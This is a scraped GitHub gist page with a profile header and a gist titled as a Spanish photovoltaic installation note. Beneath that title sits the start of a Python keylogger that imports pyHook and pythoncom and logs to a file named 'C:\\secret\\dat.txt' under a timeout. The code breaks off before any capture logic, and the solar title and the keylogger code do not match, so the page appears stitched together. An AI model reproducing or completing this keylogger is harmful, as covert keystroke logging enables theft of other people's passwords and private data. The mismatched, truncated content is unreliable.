Skip to content

Instantly share code, notes, and snippets.

View MatyFM's full-sized avatar

Mathias MatyFM

  • Madrid
View GitHub Profile
@zoilomora
zoilomora / Excedentes.md
Last active November 27, 2021 00:28
Instalación Fotovoltaica
import pyHook, pythoncom, sys, logging
import time, datetime
wait_seconds = 60
timeout = time.time() + wait_seconds
file_log = 'C:\\secret\\dat.txt'
def TimeOut():
if time.time() > timeout:
return True